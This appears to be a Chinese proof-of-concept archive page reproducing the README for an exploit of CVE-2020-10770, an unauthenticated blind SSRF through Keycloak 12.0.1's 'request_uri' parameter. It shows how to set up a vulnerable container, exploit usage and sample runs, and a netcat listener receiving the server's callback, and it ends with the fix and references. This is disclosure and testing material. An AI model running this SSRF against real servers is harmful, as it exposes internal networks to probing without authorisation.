关联漏洞
标题:红帽 Red Hat Keycloak 代码问题漏洞 (CVE-2020-10770)Description:Red Hat Keycloak是美国红帽(Red Hat)公司的一套为现代应用和服务提供身份验证和管理功能的软件。 Keycloak 存在代码问题漏洞,该漏洞源于在那里它可能迫使服务器使用OIDC参数请求uri调用一个未经验证的URL。这个缺陷允许攻击者可利用该漏洞使用这个参数来执行服务器端请求伪造(SSRF)攻击。
Description
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
介绍
# Keycloak-12.0.1-CVE-2020-10770
> Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
[Exploit-DB-50405](https://www.exploit-db.com/exploits/50405)
Expected outcome: Port scan of localhost or internally accessible hosts.
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
Vulnerable application :
```shell
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1
```
### Usage:
```shell
cfx: ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]
-=[Keycloak Blind SSRF test by ColdFusionX]=-
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Keycloak Target URL (Example: http://127.0.0.1:8080)
Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
```
### POC:
- Scenario 1: Non Vulnerable Target
```shell
cfx: ~/keycloak
→ python3 exploit.py -u http://localhost:8080
[+] Keycloak Bind SSRF test by ColdFusionX
[^] Input Netcat host:port -> 192.168.0.1:4444
[-] Invalid URL or Target not Vulnerable
```
- Scenario 2: Vulnerable Target
```shell
cfx: ~/keycloak
→ python3 exploit.py -u http://localhost:8080
[+] Keycloak Bind SSRF test by ColdFusionX
[^] Input Netcat host:port -> 192.168.0.1:9994
[+] BINGO! Check Netcat listener for HTTP callback :)
```
HTTP Callback on nc listener:
```
cfx: ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate
```
### Solution
Upgrade to Keycloak 12.0.2 or later version
### Reference
- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
文件快照
[4.0K] /data/pocs/6ed813ba1cdfc33bf855985e721823dc69e39af9
├── [1.8K] exploit.py
├── [1.0K] LICENSE
└── [2.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。